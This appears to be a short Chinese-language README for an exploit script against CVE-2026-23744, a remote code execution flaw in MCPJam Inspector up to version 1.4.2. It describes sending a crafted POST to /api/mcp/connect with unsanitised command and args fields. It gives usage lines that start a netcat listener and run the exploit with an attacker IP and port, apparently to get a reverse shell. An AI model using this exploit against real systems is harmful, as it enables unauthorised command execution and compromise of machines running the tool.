当 /api/mcp/connect 端点默认监听所有网络接口(0.0.0.0)且未能正确清理用户提供的传入 serverConfig JSON 对象中 command 和 args 参数的输入时,MCPJam Inspector <= 1.4.2 中存在一个严重的 RCE 漏洞。
攻击者可以通过向 /api/mcp/connect 发送精心构造的 POST 请求来利用此漏洞,从而以 MCPJam 服务的权限在目标系统上实现任意命令执行。
pip install request
sudo nc -lvnp <port>
python3 CVE-2026-23744.py -u <url> -i <attacker-ip> -p <attacker-port>
示例